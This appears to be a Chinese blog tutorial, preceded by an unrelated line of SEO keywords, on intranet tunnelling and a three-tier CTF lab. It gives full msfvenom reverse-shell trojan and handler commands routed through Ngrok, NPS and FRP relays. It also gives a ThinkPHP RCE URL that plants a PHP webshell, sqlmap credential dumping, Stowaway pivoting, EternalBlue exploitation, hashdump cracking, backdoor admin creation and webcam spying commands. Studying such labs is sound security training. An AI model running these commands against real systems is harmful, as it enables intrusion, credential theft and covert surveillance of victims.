网站建设所需要的内容,衡阳网站建设公司电话,上海企业网站怎么建设,html网站支付链接怎么做数据来源 本文仅用于信息安全学习#xff0c;请遵守相关法律法规#xff0c;严禁用于非法途径。若观众因此作出任何危害网络安全的行为#xff0c;后果自负#xff0c;与本人无关。 必要基础知识点#xff1a;
内外网简单知识内网 1 和内网 2 通信问题正向反向协议通…数据来源 本文仅用于信息安全学习请遵守相关法律法规严禁用于非法途径。若观众因此作出任何危害网络安全的行为后果自负与本人无关。 必要基础知识点
内外网简单知识内网 1 和内网 2 通信问题正向反向协议通信连接问题内网穿透代理隧道技术说明
演示案例
内网穿透 Ngrok 测试演示-两个内网通讯上线内网穿透 Frp 自建跳板测试-两个内网通讯上线CFS 三层内网漫游安全测试演练-某 CTF 线下 2019
案例 1-内网穿透 Ngrok 测试演示-两个内网通讯上线 实验环境两个不同的内网(有网络)实现穿透控制我这里开两台虚拟机
1注册-购买-填写-确认
Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器 开通成功总共花费2元都是实名的不要攻击别人主机很容易就找到你 我这里先改一下代理的配置 2下载客户端 我这里下载放到kali中 Sakura Frp | 樱花内网穿透 — 免费内网穿透_免费端口映射_高速_高防节点_不限流量_Minecraft我的世界_微信开发调试_群辉NAS_无需公网_免备案
2启动客户端 # 启动客户端 自己的隧道id
./sunny clientid 223404400069 相当于对方访问你代理服务器上的域名就会指向到你内网的地址192.168这边来
代理解析首先我们刚才申请的公网域名http:// .... .com 在公网或其他可以联网的主机上是可以访问的到的然后我们又下载并启动了客服端所以别人访问我们的公网域名http:// .... .com这个连接就会被代理服务器转发到我们的客户端口也就是我们自己的内网这样就能实现两个不同内网通信。 3使用metasploit生成后门文件这个软件是kali自带的其他使用Kali最强渗透工具- metasploit_kali系统常用渗透工具_正经人_____的博客-CSDN博客
再新建一个终端执行下面的命令 # 攻击模块 协议名
msfvenom -p windows/meterpreter/reverse_http lhost代理服务器的域名 lport80 -f exe -o test.exe# 参数介绍
# lhost 代表你是谁这里用代理的域名
# lport 要开启的监听端口
# exe 是windows格式文件是指生成木马文件的文件格式exe 和 dllWindows 系列、elfLinux 系列和 Mach-OMac系列
# -o 是指output输出后面跟的demo.exe是文件名自定义随便改4在kali的msfconsole里开启监听等待受害者运行上钩 msfconsole # 启动 metasploita命令行use exploit/multi/handler # 使用模块show options # 查看设置查看这个模块需要配置那些选项才能使用
set payload windows/meterpreter/reverse_http # 设置攻击载荷这个攻击载荷要与上面用的一样才行
set lhost 192.168.1.3 # 设置侦听主机kali自己的ip
set lport 4444 # 帧听端口这里要与你代理服务器中设置的本地端口一致
exploit 5将我们刚才生成的木马复制到虚拟机中执行然后查看kali中的监听情况 免费的网速慢到死一直没法反向shell换个内网穿透软件
我这里改用腾讯云搭建nps实现内网穿透 参考
如果你需要购买腾讯云可以参考我之前的的教程(105条消息) 将 node mysql vue 部署到服务器_nodejsmysql配置云服务器_正经人_____的博客-CSDN博客
我的内网穿透客户端与服务端 参考这篇文章搭建的NPS内网穿透的搭建与演示 - 腾讯云开发者社区-腾讯云 (tencent.com)
连接腾讯云域操作腾讯云用到的软件xfp 7与xshell 7
1 下载NPS的服务端与客户端工具 2下完成后把服务端的文件解压上传到腾讯云的目标下并设置权限随便一个目录看个人习惯 这里设置权限有两种方法
1、就用Xftp工具自带的功能设置 2、使用命令设置
sudo chmod 777 nps # 赋予权限nps 是要设置的文件
3修改配置文件服务端配置文件 我这里就改了web管理端口默认的8080我的被占用了 如果你要改其他的可以参考这篇端口的说明来改 最后在腾讯云开放的端口 端口不开放会被防火墙拦截 下面说一下我遇到的问题域配合木马上线主机
4启动服务端并访问web管理页面
启动服务端
# 切换到npc的根目录下这里你们要改成自己的存放路径
cd /opt/内网穿透/NPS/linux_386_server# 启动nps
./nps访问web管理页面如果能成功访问恭喜你服务端配置成功了 使用用户名和密码登陆默认admin/123正式使用一定要更改修改/opt/nps/conf/nps.conf配置文件中的web_password 5启动客户端
先在web的管理页面创建客户端 我的客户端是安装在kali中 命令执行后出现像下面这样的就是启动成功了 6然后就可以创建代理了 - 创建一个TCP隧道
在web管理页面创建 访问公网ip10001端口就是相当于访问我们本地的4444所以后面我们只需要监听本地的4444端口就能接收到木马上线的数据
7创建木马并开启监听
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost公网ip腾讯云的ip lport10001 -f exe -o demo.exe# 注意这里使用的攻击载荷是window64位然后是TCP连接的windows/x64/meterpreter/reverse_tcp之前是http不要搞错了
# 10001 是刚才在服务器开启的端口这里也要一样
# 其他参数跟我之前介绍的一样就不多说了开启监听
进入msfconsole环境
msfconsole 使用模块
use exploit/multi/handler 设置攻击载荷要与刚才生成木马的载荷一样
set payload windows/x64/meterpreter/reverse_tcp 设置监听主机与端口就是当前kali的ip要与在服务端口设置的内网ip一样不然监听不了
set LHOST 192.168.1.3
set LPORT 4444
最后启动模块
run 8将刚才生成的木马文件复制到受害者主机上我这里是win7虚拟机注意我们刚才生成的木马是windows64位的文件所以这里也要符合要求不然运行不了 运行后回到kali的监听页面查看 拿到这里反向shell能干嘛我这里就不多说了可以输入help # 查看帮助可以打开对方的摄像头之类的很多隐私操作所以建议你们平时没事还是用胶布之类的东西把摄像头挡住不然被监控了都不知道
这个帮助信息是英文的需要中文解释的可以看我之前写的文章Kali最强渗透工具- metasploit_kali系统常用渗透工具_正经人_____的博客-CSDN博客 比如
screenshare 共享实时监视远程用户桌面 record_mic从默认麦克风录制音频X秒webcam_chat开始视频聊天webcam_list列出网络摄像头webcam_snap从指定的网络摄像机拍摄快照webcam_stream从指定的网络摄像机播放视频流打开摄像头 最后不得不说便宜没好货还是有个公网ip方便能干很多东西比如上传网站、反向shell和很多外网攻击都要用到公网ip能省很多钱我要是知道公网ip也能搭建内网穿透我就不搞那个工具了浪费我两蚊纸。。。。
案例 2-内网穿透 Frp 自建跳板测试-两个内网通讯上线参考
自行搭建方便修改成本低使用多样化适合高富帅及隐私哥哥们
Frp下载Releases · fatedier/frp (github.com) 安装服务端frps
1将下载的文件解压上传到服务器 2修改配置文件并启动服务端腾讯云主机记得修改防火墙配置出入口
修改配置文件frps.ini
[common]
# 这个默认端口是7000就是客户端和服务端通信的不是你转发的那个端口
# 如果这个要改了客户端的7000也要改成和这里一样。
bind_port 6660# 这个是frp的web管理控制台的用户名密码和登录端口
dashboard_user admin
dashboard_pwd aaaWcb123
dashboard_port 6661# 这个token之后在客户端会用到相当于客户端登录服务器端毕竟这个东西不能随便给人用自己随便输入一串字符串就行
token wertyoqazxcvbnjhgfcvbn# 心跳连接必须得有frp 0.43.0版本如果不加60秒就会自动断开连接
# 服务器就加这一条客户机每台都要加。
heartbeat_timeout 30改为配置文件后腾讯云也要开放对应的端口 运行frpsc这里要设置一下frps文件权限方法跟上面一样这里就不多说了
./frps -c frps.ini 登录服务器web管理端 安装客户端-frpc (我这里用的文件根刚才服务端上传的文件一样懒的分开)
1修改配置文件frpc.ini
[common]
# 你frp服务器的公网ip地址
server_addr 0.0.0.0
# 这里要与服务端的连接端口一样
server_port 6660
# token与frps.ini 相同
token wertyoqazxcvbnjhgfcvbn# 这里取名随意,一般有意义就行
[ssh]
# 穿透协议类型可选tcpudphttphttpsstcpxtcp这个设置之前必须自行搞清楚应该是什么
type tcp
# 你当前内网服务器的网卡IP地址不要用127.0.0.1
local_ip 0.0.0.0
# 转发给本机的端口
local_port 10000
# 服务端用 6662 端口转发给本机
remote_port 6662# 服务器与客户机之间的心跳连接如果没有每隔60秒就会自动断开连接
heartbeat_timeout 30腾讯云要开放端口 2运行frpc
./frpc -c frpc.ini 这个时候打开fpr服务端的命令行就可以确认是否成功了 3制作木马测试是否能上线 生成后门 # lport要与frpc.ini文件的remote_port属性相同
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost公网ip lport6662 -f exe -o frp.exe 启动监听
msfconsole # 进入msfconsole环境
use exploit/multi/handler # 使用模块
set payload windows/x64/meterpreter/reverse_tcp # 设置攻击载荷要与生成木马时用的一样
set LHOST 192.168.1.3 # 设置监听ip本机ip
set LPORT 10000 # 设置监听端口要与frpc.ini的local_port属性相同
run # 启动模块
4靶机运行木马frp.exe即可我这里是要win7中运行
过程木马通过6662端口把数据传递给服务端服务端收到后就会转发给我们的本机/客户端的10000端口然后我们在本机监听了10000端口所以最后成功反向shell
木马运行服务端会接收并转发数据 案例 3 - CFS 三层内网漫游安全测试演练-某 CTF 线下 2019
参考(12条消息) CFS 三层内网漫游安全测试演练_acepanhuan的博客-CSDN博客
十分感谢这位老哥我找了很多复现文章都没有给出靶机环境的下载链接就这位老哥有。
大致思路 攻击者kali与Target1网卡是同一网段先通过同一网段入侵到Target1再通过Target1上的VMnet3网卡我这里是VM1与Target2建立通信并入侵然后再通过Target2上的VMnet2网卡入侵Target3 来源 2019 某 CTF 线下赛真题内网结合 WEB 攻防题库涉及 WEB 攻击内网代理路由等技术每台服务器存在一个 Flag获取每一个 Flag 对应一个积分获取三个 Flag 结尾。
靶机环境搭建
下载靶场虚拟机https://pan.baidu.com/s/1O9pgm9UZCSIdifMEb0E9ZA#list/path%2F提取码qaza这是个永久链接只要分享者不取消
下载完成后就可以导入虚拟机我的第一次导入都失败重试就好了 老哥没有给出开机密码我又找了其他文章参考
target1和target2账号密码root / teamssix.com
target3开机密码teamssix.com
1先配置一下虚拟机的网络 VM1192.168.22.0
VM2192.168.33.0
VM8192.168.1.0 然后给虚拟机分配网卡 名称 网卡 kali VM8 Target1 VM8、VM1 Target2 VM1、VM2Target3VM2 2检测各个虚拟机是否可以通信
kali《--------------》target1 可以ping通的原因kali与target1都有桥接到相同的网卡VM8
target1《--------------》target2 target1与target2都是桥接到VM1
target2《--------------》target3 target2与target3都是桥接到VM2
能出现下面这种网页一般都是使用了某种网站的搭建框架不然一般都是空白页 这里就可以得到Target1的ip是192.168.1.75
我们这里都能访问 Target1的端口这就说明他们是可以互相通信的所以后面就尝试target1《--------------》target2 target2《--------------》target3
我这里使用xshell连接虚拟机执行命令在虚拟机运行命令太麻烦
因为我发现target1与target2都开启了ssh服务22端口不然我也懒得搞
这里需要注意的是如果要在真实机访问虚拟机那你必须要开真实机开启虚拟机对应的网卡 开始连接 Target2、3虚拟机就不用连接了
测试Target1是否能与Target2通信 ping 192.168.22.129 -c4 # -c4 表示发送4个包不写就是一直ping Target3中尝试pingTarget2注意这里是pingVM2网卡的ip192.168.33刚才是22
ping 192.168.33.128 3设置宝塔启动web服务刚才我们访问Tagrget1的80端口时页面显示是找不到网站这是因为靶机没有开启web服务所以要设置一下
Tagrget1
地址http://你的Tagrget1虚拟机的IP:8888
这里提示我们要输入一条命令才能查看宝塔面板入口那就按照提示来 /etc/init.d/bt default Bt-Panel-URL你的ip:8888/a768f109
username: eaj3yhsl
password: 41bb8fee 有了访问的入口与登录账号我们就登录看看 添加完成后网站的80端口就可以访问了 Target2也是同样的方法进行入口、账号获取 不过到这里你会发现一个问题现在只有Target1能访问Target2但是Target1无法打开浏览器这就打不开Target2的宝塔面板了我不知道别人在这里是如何解决的我这里的解决方案在真实机开启Target2对应的网卡这样就可以在真实机访问Target2虚拟机 Bt-Panel-URL: http://你的ip:8888/2cc52ec0
username: xdynr37d
password: 123qwe.. # 这里我用我获取到的密码766e248d 登录不成功真坑访问一下Target2的80端口看看 到这里靶机环境配置完成了下面开始攻击演练
攻击演练
1信息收集无论是什么攻击信息收集都是前提这决定你是否能找到漏洞 如果是现实情况下我们并不知道那台目标主机是可以与我们攻击机kali进行通信的这时就可以借助工具进行扫描我这里使用kali自带的nmap工具进行扫描
先收集一下ip当前攻击机可以访问的靶机ip
nmap -sP 192.168.1.0/24 # 扫描192.168.1.0整个网段的存活地址筛选一下那个ip是我们要找的靶机虚拟机如果是靶机肯定会开放一些端口如http的80或远程桌面的3389之类的
一般一个网段的开头ip或结尾ip会被设置为网关地址1或254但是这只是一种规范并不是绝对的
nmap 目标ip # 简单扫描啥都不写会先扫描在线状态再扫描所有端口号 访问一下靶机的80端口看看
收集到了目标网段使用ThinkPHP V5搭建的 使用工具检测目标网站是否存在漏洞ThinkPHP getshell工具 确认存在远程命令执行漏洞 也可以查看一下ip
http://192.168.1.75//index.php?sindex/\think\app/invokefunctionfunctionphpinfovars[0]100index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]id 或者你不想用工具也可以手动Getshell 编码前
?php eval($_POST[cmd]);?
url编码后
PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4
POC:
http://192.168.1.75/index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4|base64 -d cmd.php 2使用远程命令执行漏洞直接給目标生成php的一句话马因为目标网站就是php写的所以这里生成php的木马
# echo 这个命令无论目标是windows还是linux系统都可以用
echo ?php eval($_POST[pass]);? shell.php# 命令1: echo 需要添加的字符串 [路径\]文件名.扩展名
# 注释和都可以将命令的输出到某个文件中若文件不存在则同时创建该文件
# 为追加
# 为覆盖 有了木马后我们就可以使用工具连接它 这里推荐用蚁剑连接我用菜刀连接不上
中国菜刀https://pan.baidu.com/s/1gvTQzWc3T4V4jVT7AQsbCg?pwdwavp
中国蚁剑
官网Releases · AntSwordProject/AntSword-Loader (github.com)下载win64 安装参考中国蚁剑(antSword)下载、安装
# 连接url 密码pass (刚才生成木马时设置的)
http://192.168.1.75/shell.php 3木马连接成功后我们就可以针对Target_1进行信息搜集成功拿到Target_1主机的flag 首先要明白我们现在演示的案例就是CFS比赛的线下复现这种比赛的获胜条件就是成功夺旗成功找到并读取flag.txt文件的内容 所以这里我们先通过蚁剑寻找Target_1虚拟机中看是否存在flag.txt文件。 但是这个比赛的题目就是找到3份flag文件分别存放在3个虚拟机中之前我们就通过存活ip扫描只发现一个虚拟主机Target_1所以其他两台主机的突破口就在这台虚拟机上所以我们要进行信息收集。 ip a # 收集当前的主机网卡信息 这里就发现Target_1主机还有网卡ip网段是192.168.22.0/24 但是我们现在用kali是无法与该网段通信的这就需要借助“跳板” 4制作“跳板”让kali虚拟机可以访问处于另一个网段的Target_2靶机 这里就用MSF生成木马制作跳板用cs也行CS和MSF的数据是可以进行交互的后面的文章会详细介绍msf是kali自带的不用自己再安装就比较方便而且如果用CS制作木马还需要借助插件才行。感兴趣的可以看这篇cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客
生成linux系统木马
# 使用linux攻击模块 tcp协议的木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.1.3 LPORT1111 -f elf text.elf# LHOST 本机ipkali的ip
# LPORT 要开启的监听端口随便写不重复就行 开启端口监听制作鱼钩
msfconsole # 启动 metasploita命令行
use exploit/multi/handler # 使用模块
set payload linux/x64/meterpreter/reverse_tcp # 这个攻击载荷就是上面我们使用的攻击载荷
set LHOST 192.168.1.3 # LHOSTS为 listen host 侦听主机代表你是谁既kali的IP地址
set lport 1111 # 就是要在kali上要开启的端口注意这里的端口要和前面生成木马文件的端口一样
run # 运行模块简单理解就是把鱼钩放到河里 将木马通过蚁剑上传到Target1并执行 执行目标
chmod x text.elf # 赋予text.elf文件执行权限
./text.elf # 手动执行木马 回到kali查看监听情况 5使用代理实现内网不同网段之间的互相访问 kali是处于192.168.1.0/24网段Target2是处于92.168.22.0/24网段如何让kali访问22网段与Target2建立通信 msf和cs都有代理集成功能我们使用这些功能设置.先添加路由。
run get_local_subnets # 获取Target1的网卡信息run autoroute -p # 查看当前路由发现当前路由是空的 run autoroute -s 192.168.22.0/24 # 添加对22网段的路由# 会话为session1 接下来通过MSF自带的代理模块来实现Kali访问target2 建立路由后kali可以和22网段进行通信只能在MSF上面进行通信那么我们想要通过session1用工具去攻击22网段这个时候该怎么办 为了解决这种情况我们可以在本地开一个代理MSF自带一个代理模块通过这个代理给其他人一个端口去连接然后我们就可以用自己的真实机去连接kali的端口这样就能访访问192.168.22.0/24网段了
exit 退回上一级执行下面的命令开启代理 use auxiliary/server/socks_proxy # 使用代理模块
set srvport 2222 # 设置连接端口随便写不重复就行
set srvhost 0.0.0.0 # 设置可以连接的ip0.0.0.0匹配所有ip
run # 启动模块 启动后msf会在本机kali开启一个2222端口 通过socks协议将当前msf的会话分享到2222代理端口上 kali可以通过其他的工具去访问代理端口 配置 proxychains 代理工具这个工具是kali自带的不用安装
proxychains 工具可以用来调用其他的工具
vim /etc/proxychains4.conf # 打开配置文件# 现在新版本是5、kail的ip、刚才设置的代理端口
socks5 192.168.1.3 2222 配置好之后就可以开启扫描
如果使用的是socks4a的话socks4a不支持icmp协议所以要使用不进行ping命令的-Pn
-Pn扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT扫描 TCP 数据包已建立的连接 connect
proxychains4 nmap -Pn -sT 192.168.22.0/24 -p80 # 用代理扫描很慢proxychains4 nmap -Pn -sT 192.168.22.128 -p80 # 为了省时间我直接扫描Target2的ip地址
Nmap通过探测将端口划分为6个状态
open端口是开放的closed口是关闭的filtered:端口被防火墙IDs/IPs屏蔽无法确定其状态unfiltered第口没有屏蔽,但是否开放需要进一步确定open | filtered端口是开放的或被屏蔽。closed | filtered端口是关闭的或被屏蔽 一直扫描不出来
--------------------------------这代理工具搞的我心态爆炸半天都搞不好换个代理工具--------------------------------
使用stowaway代理这个工具用起来贼爽一次就成功配置方便参考
这个攻击的其他使用参考(6条消息) Stowaway搭建多级网络代理_stowaway代理_山山而川的博客-CSDN博客
项目地址GitHub - ph4ntonn/Stowaway: Stowaway -- Multi-hop Proxy Tool for pentesters
下载地址Release Stowaway · ph4ntonn/Stowaway · GitHub 服务端的上传的kali中客户端的通过蚁剑上传到Target1虚拟机跟刚才上传木马的方法一样
先配置服务端监听5566端口密码123456 可改
sudo chmod 777 linux_x64_admin # 赋予执行权限
# kali的ip监听端口随便写 123456是连接密码
./linux_x64_admin -l 192.168.1.3:5566 -s 123456 然后去运行客户端
chmod 777 linux_x64_agent # 赋予执行权限
# kali的ip 这里的端口和密码要与客户端一样
./linux_x64_agent -c 192.168.1.3:5566 -s 123456 --reconnect 8# --reconnect 8 当控制端掉线时客户端每隔8s重连控制端 查看服务端 客户端成功连接在kali 6001端口开启socks代理端口可改
use 0 # use id 选择要使用的目标节点
socks 6001 # socks lport外部访问端口 启动socks5服务器 到这里我们的代理就设置成功了我们可以在kail或真实机使用kali的ip6001端口访问Target1了是不是贼简单
6搞完代理之后我们就可以访问Target2虚拟机了现在针对Target2进行信息收集
我们现在使用nmap扫描是扫描不了的要给kali配置一下本地代理
vim /etc/proxychains4.conf # 打开配置文件# 现在新版本是5、kail的ip、刚才设置的代理端口
socks5 127.0.0.1 6001 proxychains4 nmap -Pn -sT 192.168.22.0/24 -p80 # 用代理扫描很慢proxychains4 nmap -Pn -sT 192.168.22.128 -p80 # 为了省时间我直接扫描Target2的ip地址
我这里扫描整个网段会漏掉很多ip没办法只能换成单个扫描 换单个扫描 发现有80端口开启这个端口一般都是用来部署web网站的访问一下看看
要给浏览器使用代理我们才能正常访问Target1 我这里使用插件开启代理我这里用的代理工具是Proxy SwitchyOmega
下载浏览器的扩展商店中直接下载安装谷歌、微软的浏览器都可以 给浏览器设置代理 使用代理并刷新网页成功访问八哥CMS 但是我们看这个网站没有任何提示CFS的比赛一般都是有提示的没有明显的提示我们就查看网站源代码 7对目标网站进行SQL注入
按照提示访问/index.php?rvulkeyword1 提示给出的url可以访问使用sqlmap工具扫描看看 这个工具也是kali自带的
一、检测是否存在SQL注入漏洞
# 测试目标url是否存在sql注入 可能存在sql注入的url地址
proxychains4 sqlmap -u http://192.168.22.129/index.php?rvulkeyword1# 注意这里也要使用 proxychains4 代理来运行工具不然访问不了有提示选择我都选 “Y” 第二步获取数据库名 在第一步检测的的命令后面加上--dbs # database server获取所有数据库名
proxychains4 sqlmap -u http://192.168.22.129/index.php?rvulkeyword1 --dbs 第三步获取指定数据库表 在第一步检测的的命令后面加上 -D 数据库名称 --tables # -DDatabase指定想要获取的数据库名--tables 枚举遍历DBMS数据库中的表
我先获取第一个数据库的看看bagecms
proxychains4 sqlmap -u http://192.168.22.129/index.php?rvulkeyword1 -D bagecms --tables 第四步获取指定数据库列/表项 在第一步检测的的命令后面加上-D 数据库名 -T 数据库的表名 --columns # --columns 列出表项/例
数据表先看这个bage_admin 毕竟admin是管理员英文的缩写
proxychains4 sqlmap -u http://192.168.22.129/index.php?rvulkeyword1 -D bagecms -T bage_admin --columns 这一步很奇怪之前一直打印不出数据表的列名然后我也忘记我改了哪里突然就可以了后面再试也是没问题视频中的是手动注入我也没法参考如果你们也遇到我刚才的问题只能靠你们自己排查了需要注意的是我这里的代理工具的服务端有时会自己退出然后进行sql扫描就报错如果你们也就到sql工具无法扫描就可以检查一下代理看看 第五步获取数据 把第四步命令后面的--columns换成--dump # 读取数据
proxychains4 sqlmap -u http://192.168.22.129/index.php?rvulkeyword1 -D bagecms -T bage_admin --dump 这里就得到了账号信息 用户名admin 密码46f94c8de14fb36680850768ff1b7f2a (123qwe) 有账号信息这就说明这个网站肯定有个登录页面但是我们现在不知道登录页面的URL是啥这就说明我们的信息收集还不够之前我们已经收集了目标网站的ip端口信息现在我们收集一下目标主机的文件目录信息看目标的文件目录的文件中是否存放我们需要的信息这就进入下一步骤信息收集之文件目录收集
8信息收集之文件目录收集
我这里使用kali自带的扫描工具dirb进行扫描就简单的介绍工具的使用如果需要更深层次的使用自己点这个超链接查看参考
这里一样使用 proxychains4 代理运行工具 不然我们访问不了Target2的ip
# 使用默认字典进行扫描
proxychains4 dirb http://192.168.22.129# 或者将扫描结果存放在指定的文件中方便查看-o 指定结果生成的目录
proxychains4 dirb http://192.168.22.129 -o /home/kali/桌面/output.txt# 不进递归扫描默认就是递归这样会扫描所有文件包括子文件我这里为了省时间就取消-r 取消递归
proxychains4 dirb http://192.168.22.129 -o /home/kali/桌面/output.txt -r ctf中敏感文件泄露的题型主要有以下几种原文 robots.txt robots.txt放置在一个站点的根目录下而且文件名必须全部小写是搜索引擎中访问网站的时候要查看的第一个文件记录一些目录和CMS版本信息。ctf中可以在直接访问*/robots.txt来获取文本信息。 vim备份文件 当用户在Linux编辑器编辑文件但意外退出时会在当前目录下生成一个备份文件文件名格式为文件名.swp意外退出更多次后缀可以为.swo .swn……ctf中访问*/.index.php.swp可以下载 gedit备份文件 在Linux下用gedit编辑器保存后当前目录下会生成一个后缀为“”的文件其文件内容就是刚编辑的内容。格式一般是文件名加后缀例如index.php~ ctf中也是直接访问*/文件名~ readme.md 记录CMS版本信息有的甚至有Github地址。ctf中直接访问*/readme.md www/wwwdata/wwwroot/web/webroot/ .zip/rar/tar.gz/7z/tar 往往是网站的源码备份。ctf中访问后可以下载本地查看 这里发现了robots.txt文件这个是CTF比赛的敏感文件我们访问他看看 访问 /admini/ 404 访问 /index.php?radmini 成功来到后台登录页面这种pc的系统一般都是后台管理系统所以他的登录页面也叫后台登录页 进来后成功拿到Target2靶机的Flag 现在就剩下最后一个靶机-Target3
9先看看这个管理页面有没有什么提示或什么漏洞可以被我们利用的
?php eval($_POST[pass]);? 随便找个文件夹下的文件编辑都可以 尝试先访问一下文件 解决方案先观察一下网站的路由是如何切换的也就是网站网页的切换 使用 http://192.168.22.129/index.php?rquestion/index.php 访问看看 改一下路由不加index.php 先用蚁剑连接木马看看后面再讲另一种比较稳妥的方式
这里要用蚁剑连接木马也要设置一下代理 连接木马看看 讲一下更稳妥的访问木马方式还记得刚才我们访问失败跳出来的404报错页面这个页面只要是正规一点的网站都会有而且规则都是一样的当路由匹配不上也就是找不都你要访问的页面就会自动转到这个404页面所以我们可以将木马加入到这里404页面中然后我们随便访问一个页面都能连接上木马。 10跟之前攻击Target2靶机一样上传Stowaway代理工具让我们的攻击机kali可以访问Target3靶机然后再次进行信息收集为后面的攻击做铺垫 上一步我们检测出Target2靶机也是有两个网卡一个是192.168.22.0/24这个我们已经给Target1靶机设置过代理kali中通过Target1做为跳板就可以访问Target2靶机另一个192.168.33.0/24我们是访问不了的所以也要跟之前一样给Target2设置代理kali中再通过Target2靶机当做跳板访问92.168.33.0/24网段。
设置Target2靶机的代理 这里只需要上传一个客户端程序到Target2靶机中就可以了我们把kali当做服务端之前已经上传过一个代理服务端程序一个服务端可以对接多个客户端 在之前的代理保持不变的情况下进行中操作在Target1靶机上开启一个监听监听10000端口端口可改
# 开启端口监听
listen 回到蚁剑的Target2靶机上连接Target1连接与自己相同网卡的Target1靶机ip不是连接kali
./linux_x64_agent -c 192.168.22.132:10000 -s 123456 --reconnect 8# 192.168.22.132 是Target1靶机的ip也就是说Target2连接Target1靶机 回到kali的服务端输入命令查看连接情况
back # back 返回父面板 (这个命令后面要加个空格才行)
detail # 显示连接节点的详细信息客户端成功连接在kali 6002端口开启socks代理端口可改
use 1 # use id 选择要使用的目标节点进入目标的管理页面
socks 6002 # socks lport外部访问端口 启动socks5服务器 我画一张图给你们好理解一点 然后要改一下配置文件
vim /etc/proxychains4.confsocks5 127.0.0.1 6002 11针对Target3虚拟机进行信息收集
proxychains4 nmap -Pn -sT 192.168.33.0/24 # 扫描33整个网段数据慢proxychains4 nmap -Pn -sT 192.168.33.33 # 直接扫描Target3靶机的ip速度快
发现目标开放了445端口猜测存在永恒之蓝漏洞 12尝试攻击 使用metasploit进行攻击kali自带的工具这篇文章字数太多了编译起来很卡下面的攻击我就不写的太详细了不理解的可以参考我之前写的文章(8条消息) Kali最强渗透工具- metasploit_kali系统常用渗透工具_正经人_____的博客-CSDN博客
proxychains4 msfconsole # 启动 metasploita命令行【命令行效率高,使用方便】这里也要使用proxychains4代理运行工具不然你都访问不了Target3虚拟机的ip# msf使用法则使用模块 - 配置模块必选项 - 运行模块。 三步操作就能实现对主流漏洞的攻击 use exploit/windows/smb/ms17_010_eternalblue # 使用永恒之蓝漏洞攻击模块set rhost 192.168.33.33 # 设置目标IP地址你要攻击的目标set payload windows/x64/meterpreter/bind_tcp # payload 是攻击载荷set LHOST 192.168.1.3 # LHOSTS为 listen host 侦听主机代表你是谁既kali的IP地址默认就是kali自己的IP地址如果你的不是那就可以修改set lport 3698 # 将端口设置为10001代表你要在kali上开启的端口1-65535随便选但不能被占用默认的端口是4444为了攻击的成功率可以改一下run # 运行模块开启攻击
我这里攻击失败了我给kali加一块Target3的网卡就能攻击成功。。。。。。 解决使用正向连接因为Target3并不能返回shell我们要主动连接他
方案一参考
use auxiliary/admin/smb/ms17_010_command
set command whoami
set rhost 192.168.33.33
exploit
解决方案二 -- 推荐参考
注意我们的代理有点不稳定第一次攻击不成功就多试几次第二次之后攻击就是执行run就好了
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.33.33
set LPORT 6666
run
# 设置正向连接 执行shell命令速度真要命 我这里一直进入不去shell没办法只能换一种方式暴力破解hash值
hashdump # 获取SAM数据库的内容密码的哈希值
我这里使用saminside工具进暴力破解
把你认为可能是密码的字符串使用密码字典生成工具生成复制粘贴到下图软件中的密码本文件中密码本文件是运行程序才会自动生成
密码本的格式 要破解的hash值的格式 这里获取到了目标的账号信息Administrator\teamssix.com如果能进入shell页面我们就直接新建一个管理员账户就行了不用暴力破解
因为之前对Target3进行信息收集时发现他开启了3389端口远程桌面服务我们现在有了账户密码就尝试连接试试
kali中连接
# 这里一样要使用代理不然访问不到
proxychains4 rdesktop 192.168.33.33:3389 至此靶场打穿三个flag拿到
总结这是我花的时间最长的一篇文章太多坑了参考很多文章很多演示都省略了一些步骤就是这些步骤把我坑惨4月28号写到现在5月4号凌晨3:14分才搞定真不容易6天时间五一假期都没了这个内网学起来还是挺不错的主要就学个攻击思路为以后的学习打下夯实的基础一起加油陌生人
补充知识点如果能进入shell页面我们能对这个靶机做的操作
如果页面显示乱码解决chcp 65001 # 修改编码
1、搜索flag文件 参考
shell # 进入系统命令shell
cd / # 进入根目录原来是system32目录 搜索dir /S *flag* /B #/B 显示文件夹或文件的名字/S 显示指定目录和所有子目录中的文件这是是搜索所有文件夹中包含flag关键字的文件名
dir /S /B *flag* # 这样写也可以这里放在桌面 type C:\Users\Administrator\Desktop\flag.txt # 获取flag 2、生成后门用户
例创建后门用户并开启远程连接3389 shell # 启动dos窗口这样就能使用DOS 命令 chcp 65001 # 默认情况下编码为936中文会出现乱码问题65001为UTF-8的代码页可以正常显示中文 net user zhangsan 123456 /add net localgroup administrators zhangsan /add 或分开执行 net user zhangsan 123456 /add # 创建一个用户名为“zhangsan ”密码是“123456 ” net localgroup administrators zhangsan /add # 将zhangsan 加入到管理员组提升权限 exit # 退到上一级目录这里是退出dos窗口回到meterpreter getsystem # 先将当前的session提升为system权限以防万一 run post/windows/manage/enable_rdp # 利用此后渗透模块即可直接开启远程桌面开启受害者主机3389端口远程桌面连接端口 这样一套命令下来以后我们就可以直接使用 zhangsan 这个账号登录3389端口的远程桌面服务远程控制目标主机mstsc -v 目标ip
如果是linux主机连接rdesktop 192.168.0.103:3389 # 连接受害者主机的远程桌面如下图所示 需要注意的是你登录了对方会被你挤下线 这个操作是我之前写的文章里面的就直接复制过来的如果你还需要更深入的操作可以参考之前写的文章Kali最强渗透工具- metasploit_kali系统常用渗透工具_正经人_____的博客-CSDN博客
涉及资源
